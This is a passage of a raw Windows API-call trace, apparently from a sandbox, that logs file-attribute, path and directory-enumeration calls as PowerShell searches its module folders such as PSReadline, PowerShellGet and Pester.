(lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0218.646] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0218.646] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0218.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea58) returned 1 [0218.647] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x36 [0218.647] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x36, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0218.647] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784d540 [0218.647] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.648] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb5477959, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfff2ff0e, ftLastWriteTime.dwHighDateTime=0x1d1a04a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0218.648] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb54d73e5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2558c7, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.2", cAlternateFileName="")) returned 1 [0218.648] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0218.648] FindClose (in: hFindFile=0x784d540 | out: hFindFile=0x784d540) returned 1 [0218.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0218.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0218.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ec) returned 1 [0218.648] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933ea68 | out: lpFileInformation=0x933ea68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2f6)) returned 1 [0218.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e8) returned 1 [0218.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0218.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0218.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea10) returned 1 [0218.649] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x57d26f4 | out: lpFileInformation=0x57d26f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2f6)) returned 1 [0218.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea0c) returned 1 [0218.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0218.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ec) returned 1 [0218.649] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933ea68 | out: lpFileInformation=0x933ea68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1)) returned 1 [0218.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e8) returned 1 [0218.653] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.653] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0218.653] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.653] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0218.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea10) returned 1 [0218.653] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x57d294c | out: lpFileInformation=0x57d294c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1)) returned 1 [0218.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea0c) returned 1 [0218.653] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psd1")) returned 0xffffffff [0218.653] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psm1")) returned 0xffffffff [0218.653] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.cdxml")) returned 0xffffffff [0218.653] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.xaml")) returned 0xffffffff [0218.653] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.ni.dll")) returned 0xffffffff [0218.653] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.dll")) returned 0xffffffff [0218.656] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\fd1hvy\\documents\\windowspowershell\\modules")) returned 0xffffffff [0218.669] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules" (normalized: "c:\\program files (x86)\\windowspowershell\\modules")) returned 0x10 [0218.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea58) returned 1 [0218.761] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x31 [0218.761] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", nBufferLength=0x31, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x30 [0218.761] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc65e250, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784d8c0 [0218.763] FindNextFileW (in: hFindFile=0x784d8c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc65e250, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.763] FindNextFileW (in: hFindFile=0x784d8c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc65e8f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c48de1, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Operation.Validation", cAlternateFileName="MICROS~1.VAL")) returned 1 [0218.763] FindNextFileW (in: hFindFile=0x784d8c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc717ae6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0218.763] FindNextFileW (in: hFindFile=0x784d8c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4698376a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4698376a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0218.763] FindNextFileW (in: hFindFile=0x784d8c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc9fecb3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0218.763] FindNextFileW (in: hFindFile=0x784d8c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0218.764] FindClose (in: hFindFile=0x784d8c0 | out: hFindFile=0x784d8c0) returned 1 [0218.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0218.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.764] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0218.765] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0218.765] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0218.766] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0218.766] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0218.766] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0218.766] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5b [0218.766] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x5b, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", lpFilePart=0x0) returned 0x5a [0218.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.766] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc65e8f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c48de1, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.767] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0218.767] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x43, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x42 [0218.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.767] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc717ae6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.768] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0218.768] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x38, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x37 [0218.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.768] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4698376a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4698376a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.769] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0218.769] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x3f, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x3e [0218.769] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.769] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc9fecb3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea58) returned 1 [0218.771] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5b [0218.771] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x5b, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", lpFilePart=0x0) returned 0x5a [0218.771] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc65e8f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c48de1, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784d540 [0218.771] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc65e8f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c48de1, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.771] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc70c3d2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a75a324, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.1", cAlternateFileName="103623~1.1")) returned 1 [0218.771] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0218.772] FindClose (in: 